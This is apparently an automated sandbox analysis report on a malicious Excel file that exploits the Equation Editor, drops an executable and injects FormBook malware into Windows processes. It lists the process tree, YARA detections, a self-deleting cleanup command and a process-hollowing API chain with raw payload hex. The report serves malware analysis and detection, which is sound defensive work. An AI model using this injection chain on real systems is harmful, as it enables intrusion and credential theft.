                                              2022-01-14 15:04:36 UTC560INData Raw: 43 27 20 85 bb a2 a2 22 15 0e 45 3d fa ee 11 9f 8d b0 08 1f 11 fd ff dd 9d 07 98 54 e5 f9 f6 63 12 54 32 db 80 65 e9 bd 2c 1d 76 91 de ab 28 bd 2e bd 97 58 40 01 15 44 14 05 c1 42 94 22 60 85 d8 50 10 e9 8a 15 14 8d 05 45 50 8a 80 a0 a0 c6 1a a3 51 34 89 20 be df fd 7b 67 9e e1 ec b2 0b 0b ec 66 fd 7f 5c d7 cb ec cc 9c 36 e7 9c fb 7e ee a7 bc cf 21 1a 8f 85 47 15 10 8c 03 e0 c8 70 a2 e9 d4 11 10 78 c3 4a 63 b1 51 0a 04 a0 b9 ff 50 04 c1 2a 3c de 43 28 6c 8b ef d9 2e a9 40 a4 3e d2 1f a0 12 bc 03 fc 90 10 cb 10 a8 04 e4 a4 f2 00 2f df 31 ac c1 87 3d e9 87 ef 20 8c e0 13 85 70 63 c8 f9 f3 1d 9f a3 36 f8 7d c4 2e f2 1c a8 b9 35 c8 02 d0 15 98 13 47 1a 30 4a 00 9b 27 fa 0a bf 74 0a e0 6c 09 40 ef 19 db d6 f7 f2 24 70 02 01 3c d5 c7 cb ff 53 11 c0 ae 67 c2 e0
                                              Data Ascii: C' "E=TcT2e,v(.X@DB"`PEPQ4 {gf\6~!GpxJcQP*<C(l.@>/1= pc6}.5G0J'tl@$p<Sg
                                              2022-01-14 15:04:36 UTC576INData Raw: 6f c4 08 48 fe fd a2 45 8b 62 04 1a ff 7d c6 21 a0 c4 b0 be 40 1e 33 6f de bc 18 91 48 48 9f 79 ab 8e b4 9f 3b 77 6e 48 56 34 24 d0 10 e0 0b c9 02 87 90 dd 54 ec 51 d4 43 6c 09 ab 0c 08 01 3c 16 98 ef e8 18 64 8d 3c b1 e8 14 06 61 d5 f1 bd 49 df 51 cb cf 6c 3e fc fb b4 b4 34 6f fd 89 0d 50 1b 60 6d c1 70 0b 00 2a ef c9 1c e0 ef 13 cd c7 0d a0 b2 10 1f 9e 18 03 d6 9f 65 99 58 44 e9 31 99 00 48 80 e3 a4 10 09 b2 e1 3d 92 df a6 2d b3 1e b1 0a f6 87 0a b1 ce c1 90 43 9e 83 3d 07 09 20 1d 11 dc 79 e7 9d f9 c5 a8 b1 c4 02 24 b5 60 7f 6a 03 0a e8 82 14 44 02 32 50 05 48 45 91 82 27 02 f9 89 45 e4 3f 16 c3 77 d4 7a 64 0e 08 12 95 a6 54 54 80 2f 4b 3d 01 33 0b e5 2e 54 90 1b 41 3a b1 12 15 24 02 6f b2 14 43 15 11 42 55 b9 0a 64 14 6a 10 43 a0 e4 54 ee 42 6d 29 82
                                              Data Ascii: oHEb}!@3oHHy;wnHV4$TQCl<d<aIQl>4oP`mp*eXD1H=-C= y$`jD2PHE'E?wzdTT/K=3.TA:$oCBUdjCTBm)


                                              Code Manipulations

                                              Statistics

                                              CPU Usage

                                              Memory Usage

                                              High Level Behavior Distribution

                                              Behavior

                                              System Behavior

                                              General

                                              Start time:16:03:27
                                              Start date:14/01/2022
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                              Imagebase:0x13fa90000
                                              File size:28253536 bytes
                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:16:03:46
                                              Start date:14/01/2022
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                              Imagebase:0x400000
                                              File size:543304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:16:03:50
                                              Start date:14/01/2022
                                              Path:C:\Users\Public\Pcportk28.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\Public\Pcportk28.exe
                                              Imagebase:0x10e0000
                                              File size:601600 bytes
                                              MD5 hash:25EE51200E7D86AB2C531748E5C01C72
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.486571220.0000000002581000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low

                                              General

                                              Start time:16:03:54
                                              Start date:14/01/2022
                                              Path:C:\Users\Public\Pcportk28.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\Public\Pcportk28.exe
                                              Imagebase:0x10e0000
                                              File size:601600 bytes
                                              MD5 hash:25EE51200E7D86AB2C531748E5C01C72
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:16:03:56
                                              Start date:14/01/2022
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0xffa10000
                                              File size:3229696 bytes
                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              General

                                              Start time:16:04:07
                                              Start date:14/01/2022
                                              Path:C:\Windows\SysWOW64\wininit.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\wininit.exe
                                              Imagebase:0x6f0000
                                              File size:96256 bytes
                                              MD5 hash:B5C5DCAD3899512020D135600129D665
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              General

                                              Start time:16:04:12
                                              Start date:14/01/2022
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del "C:\Users\Public\Pcportk28.exe"
                                              Imagebase:0x4a4c0000
                                              File size:302592 bytes
                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis

                                                Execution Graph

                                                Execution Coverage:15.8%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:7.3%
                                                Total number of Nodes:150
                                                Total number of Limit Nodes:25

                                                Graph

                                                execution_graph 7486 9e02e2 7487 9e017e 7486->7487 7488 9e05fc 7487->7488 7489 9e0c19 6 API calls 7487->7489 7489->7487 7294 9e0591 7296 9e017e 7294->7296 7295 9e05fa 7296->7295 7298 9e0c19 7296->7298 7299 9e0c42 7298->7299 7303 9e0c88 7299->7303 7307 9e0c83 7299->7307 7300 9e0c70 7300->7296 7304 9e0ca5 7303->7304 7311 9e1111 7304->7311 7308 9e0ca5 7307->7308 7310 9e1111 6 API calls 7308->7310 7309 9e0ce5 7309->7300 7310->7309 7312 9e113a 7311->7312 7335 9e11ab 7312->7335 7347 9e1cca 7312->7347 7351 9e120e 7312->7351 7363 9e17d1 7312->7363 7370 9e1a73 7312->7370 7374 9e1675 7312->7374 7379 9e1b77 7312->7379 7384 9e1956 7312->7384 7388 9e1876 7312->7388 7393 9e1779 7312->7393 7397 9e1598 7312->7397 7403 9e1438 7312->7403 7407 9e1b5a 7312->7407 7411 9e1bda 7312->7411 7418 9e17ff 7312->7418 7422 9e15e3 7312->7422 7426 9e1742 7312->7426 7430 9e1aa2 7312->7430 7434 9e1842 7312->7434 7438 9e17a6 7312->7438 7442 9e1bc6 7312->7442 7313 9e0ce5 7313->7300 7337 9e11b8 7335->7337 7336 9e12f8 7336->7313 7337->7336 7446 35fa38 7337->7446 7338 9e13a2 7340 9e1428 7338->7340 7346 35f448 Wow64SetThreadContext 7338->7346 7339 9e1402 7339->7340 7343 9e2128 ResumeThread 7339->7343 7344 9e2117 ResumeThread 7339->7344 7341 9e19b2 7340->7341 7345 35f6a0 WriteProcessMemory 7340->7345 7341->7313 7343->7340 7344->7340 7345->7340 7346->7339 7348 9e1ce7 7347->7348 7450 35f6a0 7348->7450 7354 9e121b 7351->7354 7352 9e12f8 7352->7313 7353 9e13a2 7357 9e1428 7353->7357 7454 35f448 7353->7454 7354->7352 7360 35fa38 CreateProcessA 7354->7360 7356 9e19b2 7356->7313 7357->7356 7358 35f6a0 WriteProcessMemory 7357->7358 7358->7357 7360->7353 7364 9e17db 7363->7364 7368 9e2128 ResumeThread 7364->7368 7369 9e2117 ResumeThread 7364->7369 7365 9e1c1c 7366 9e19b2 7365->7366 7367 35f6a0 WriteProcessMemory 7365->7367 7366->7313 7367->7365 7368->7365 7369->7365 7371 9e1a79 7370->7371 7372 9e19b2 7371->7372 7373 35f6a0 WriteProcessMemory 7371->7373 7372->7313 
7373->7371 7470 35f800 7374->7470 7375 9e153b 7376 9e19b2 7375->7376 7377 35f6a0 WriteProcessMemory 7375->7377 7376->7313 7377->7375 7380 9e1e61 7379->7380 7381 9e1b84 7379->7381 7380->7313 7382 9e19b2 7381->7382 7383 35f6a0 WriteProcessMemory 7381->7383 7382->7313 7383->7381 7385 9e1968 7384->7385 7386 9e19b2 7385->7386 7387 35f6a0 WriteProcessMemory 7385->7387 7386->7313 7387->7385 7392 35f6a0 WriteProcessMemory 7388->7392 7389 9e189a 7390 9e19b2 7389->7390 7391 35f6a0 WriteProcessMemory 7389->7391 7390->7313 7391->7389 7392->7389 7394 9e178f 7393->7394 7395 9e19b2 7394->7395 7396 35f6a0 WriteProcessMemory 7394->7396 7395->7313 7396->7394 7474 9e2058 7397->7474 7478 9e2048 7397->7478 7398 9e15b4 7399 9e19b2 7398->7399 7400 35f6a0 WriteProcessMemory 7398->7400 7399->7313 7400->7398 7404 9e1442 7403->7404 7405 9e19b2 7404->7405 7406 35f6a0 WriteProcessMemory 7404->7406 7405->7313 7406->7404 7408 9e145e 7407->7408 7409 9e19b2 7408->7409 7410 35f6a0 WriteProcessMemory 7408->7410 7409->7313 7410->7408 7412 9e1be3 7411->7412 7416 9e2128 ResumeThread 7412->7416 7417 9e2117 ResumeThread 7412->7417 7413 9e1c1c 7414 9e19b2 7413->7414 7415 35f6a0 WriteProcessMemory 7413->7415 7414->7313 7415->7413 7416->7413 7417->7413 7419 9e1819 7418->7419 7420 9e19b2 7419->7420 7421 35f6a0 WriteProcessMemory 7419->7421 7420->7313 7421->7419 7423 9e15ef 7422->7423 7424 9e19b2 7423->7424 7425 35f6a0 WriteProcessMemory 7423->7425 7424->7313 7425->7423 7427 9e174f 7426->7427 7428 9e19b2 7427->7428 7429 35f6a0 WriteProcessMemory 7427->7429 7428->7313 7429->7427 7431 9e1aac 7430->7431 7432 9e19b2 7431->7432 7433 35f6a0 WriteProcessMemory 7431->7433 7432->7313 7433->7431 7435 9e1854 7434->7435 7436 9e19b2 7435->7436 7437 35f6a0 WriteProcessMemory 7435->7437 7436->7313 7437->7435 7439 9e1d9d 7438->7439 7440 9e19b2 7439->7440 7441 35f6a0 WriteProcessMemory 7439->7441 7440->7313 7441->7439 7443 9e1d9d 7442->7443 7444 9e19b2 7443->7444 7445 35f6a0 WriteProcessMemory 7443->7445 7444->7313 7445->7443 
7447 35fabf CreateProcessA 7446->7447 7449 35fd1d 7447->7449 7451 35f6ec WriteProcessMemory 7450->7451 7453 35f78b 7451->7453 7455 35f491 Wow64SetThreadContext 7454->7455 7457 35f50f 7455->7457 7457->7357 7458 9e2128 7457->7458 7462 9e2117 7457->7462 7459 9e2142 7458->7459 7466 35f358 7459->7466 7463 9e2142 7462->7463 7465 35f358 ResumeThread 7463->7465 7464 9e2171 7464->7357 7465->7464 7467 35f39c ResumeThread 7466->7467 7469 35f3ee 7467->7469 7469->7357 7471 35f84c ReadProcessMemory 7470->7471 7473 35f8ca 7471->7473 7473->7375 7475 9e2072 7474->7475 7482 35f578 7475->7482 7479 9e2072 7478->7479 7481 35f578 VirtualAllocEx 7479->7481 7480 9e20ad 7480->7398 7481->7480 7483 35f5bc VirtualAllocEx 7482->7483 7485 35f63a 7483->7485 7485->7398

                                                Executed Functions

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                 Control-flow graph (rendered image): function at 356479; calls 354968. Node/edge list not reproduced in text.
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e9eabb620b21a86cf27b5ff0bd177388c09f86742e0a7f35ee01644a3a264315
                                                • Instruction ID: b2f47aa4e75059afa2f4f7dd08255886fd2a956e5dbc64cea06c94b0fb77ecb5
                                                • Opcode Fuzzy Hash: e9eabb620b21a86cf27b5ff0bd177388c09f86742e0a7f35ee01644a3a264315
                                                • Instruction Fuzzy Hash: 46B1E770E04145CFDB02CF68C452EAEBBF1EF49301F5585AAE825EB6A2D3349D49CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                 Control-flow graph (rendered image): function at 354368; calls 3545f0, 354359, 354368, 354488, 35487e, 354f41, 355a91, 356479, 356bc8, 356c00, 357d30, 357cda. Node/edge list not reproduced in text.
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1e6da73bff3b656b0fcab01994815903547a9315b193935affcba0c88fe06cdb
                                                • Instruction ID: 136ee4a50d7e022654be7625bc7485ad5e7c5bb73db67e2ebbbaf294fb5baffa
                                                • Opcode Fuzzy Hash: 1e6da73bff3b656b0fcab01994815903547a9315b193935affcba0c88fe06cdb
                                                • Instruction Fuzzy Hash: 4FA12974A082508FC71A8B64D804BAD7BF1EF4730AF15857AE856CBAB2D734C8C9C752
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0f1811cadabdb2b536299cf1ae487cfe661789c182899e01a180ff85fdcb5a2c
                                                • Instruction ID: 5c3dd9eb77c269b550ca9d4912aedb4a6b78d05ec77f2e2138340ffdd3632410
                                                • Opcode Fuzzy Hash: 0f1811cadabdb2b536299cf1ae487cfe661789c182899e01a180ff85fdcb5a2c
                                                • Instruction Fuzzy Hash: 6EB10074D002698FDB25CF66C884BEDBBB2AF89304F2085EAD509A7291DB305EC5CF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3df3eaed8db627152d0917606917e5fd6a42b0eac8fd444f2ab17df4e4e5cb3c
                                                • Instruction ID: 07a9ae0dcd7708cd858469a21fb7c05db74009b340b869331ea40d3585658c7b
                                                • Opcode Fuzzy Hash: 3df3eaed8db627152d0917606917e5fd6a42b0eac8fd444f2ab17df4e4e5cb3c
                                                • Instruction Fuzzy Hash: A6914570E08245CFC702CF78C851AAEFBB5AF49306F55856BD865E76A1C338D849CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6d798e2b9819cc616e26d5ec07d6367bced3663d9af21582b8beed23352f549e
                                                • Instruction ID: 3a422a80f05141c3e63b524bafd605a194131d698ef7567d66b99376238f5c71
                                                • Opcode Fuzzy Hash: 6d798e2b9819cc616e26d5ec07d6367bced3663d9af21582b8beed23352f549e
                                                • Instruction Fuzzy Hash: 9D712A749086448FC712CF78C882ABEBBF4EF49312F55856BD896D76B1C3349909CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e92795e9417c71fc2941d439f5f8158f86cc337a498c8b522f0b909b1ccfe700
                                                • Instruction ID: 5f34fb19dbf965521e79f0ad34967085c176d6d5f043e99d62d9e8bb10e91f09
                                                • Opcode Fuzzy Hash: e92795e9417c71fc2941d439f5f8158f86cc337a498c8b522f0b909b1ccfe700
                                                • Instruction Fuzzy Hash: 0B613871A08244CFC702CF68D851EA9BBB1BF41312F9985BBD855DB2F2C7349909DB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                 Control-flow graph (rendered image): function at 35fa38; calls CreateProcessA in block 35fc24-35fd1b. Node/edge list not reproduced in text.
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0035FCFF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID: 9lz$ 9lz
                                                • API String ID: 963392458-3733230081
                                                • Opcode ID: 12418c09f50dd034d837ce91df6677b9cc6579a09e946567839b794b8555e898
                                                • Instruction ID: 8d8416fd4bbbf3e27f9f30e8778a08ba04159720083b928b05008af050950f11
                                                • Opcode Fuzzy Hash: 12418c09f50dd034d837ce91df6677b9cc6579a09e946567839b794b8555e898
                                                • Instruction Fuzzy Hash: 01C13270D002298FCB21CFA4C845BEDBBB1BF49304F1195A9D909B7250EB749A89CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                 Control-flow graph (rendered image): function at 35f6a0; calls WriteProcessMemory in block 35f722-35f789. Node/edge list not reproduced in text.
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0035F773
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID: 9lz
                                                • API String ID: 3559483778-3545502388
                                                • Opcode ID: d09eec3b6145314dc689ba942fd1fc493d2c44bc957b8defed105d18f4188cd4
                                                • Instruction ID: 07aac67511ffa8f644a0cdca7404179d608959d7e8866f16e6198403cc9661fc
                                                • Opcode Fuzzy Hash: d09eec3b6145314dc689ba942fd1fc493d2c44bc957b8defed105d18f4188cd4
                                                • Instruction Fuzzy Hash: B4419AB4D012589FCF00CFA9D984AEEFBF1BB49314F24942AE814B7250D775AA45CF64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                 Control-flow graph (rendered image): function at 35f800; calls ReadProcessMemory in block 35f800-35f8c8. Node/edge list not reproduced in text.
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0035F8B2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID: 9lz
                                                • API String ID: 1726664587-3545502388
                                                • Opcode ID: 73ab73e9d9ff754a332e085d116d56c61bc4458a6bc50b4aa51805a817d64002
                                                • Instruction ID: d762028488a033a6dea5ac16d69c21553a7b8274043f71695e6303563e8e88c3
                                                • Opcode Fuzzy Hash: 73ab73e9d9ff754a332e085d116d56c61bc4458a6bc50b4aa51805a817d64002
                                                • Instruction Fuzzy Hash: DC4199B5D042589FCF10CFA9D884AEEFBB1BF49314F20942AE814B7250D735A945CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                 Control-flow graph (rendered image): function at 35f578; calls VirtualAllocEx in block 35f578-35f638. Node/edge list not reproduced in text.
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0035F622
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID: 9lz
                                                • API String ID: 4275171209-3545502388
                                                • Opcode ID: 0f8e45eec6c663cbf54cd47b24813fa8b9ba1d54b939d6901df255c79a8dda26
                                                • Instruction ID: 542ad5dbe765b52e507939c721654a45146f6af351851c131d57b48921b9293b
                                                • Opcode Fuzzy Hash: 0f8e45eec6c663cbf54cd47b24813fa8b9ba1d54b939d6901df255c79a8dda26
                                                • Instruction Fuzzy Hash: 6A4199B8D002589FCF10CFA9E884ADEFBB1BB49314F20942AE815B7310D735A905CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                 Control-flow graph (rendered image): function at 35f448; calls Wow64SetThreadContext in block 35f4bf-35f50d. Node/edge list not reproduced in text.
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 0035F4F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID: 9lz
                                                • API String ID: 983334009-3545502388
                                                • Opcode ID: b6d5a9914c64103b6793a429bf911ebf5d7d596c90e4e4ed7bed904ad858cdd6
                                                • Instruction ID: c98955c9e813fdf6c7cce186ce1979b60bf61083b3a28c5e1232267016e84a6d
                                                • Opcode Fuzzy Hash: b6d5a9914c64103b6793a429bf911ebf5d7d596c90e4e4ed7bed904ad858cdd6
                                                • Instruction Fuzzy Hash: 0441AEB4D012589FCB10CFA9D884AEEFBB1BF49314F24842AE414B7340D739A949CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
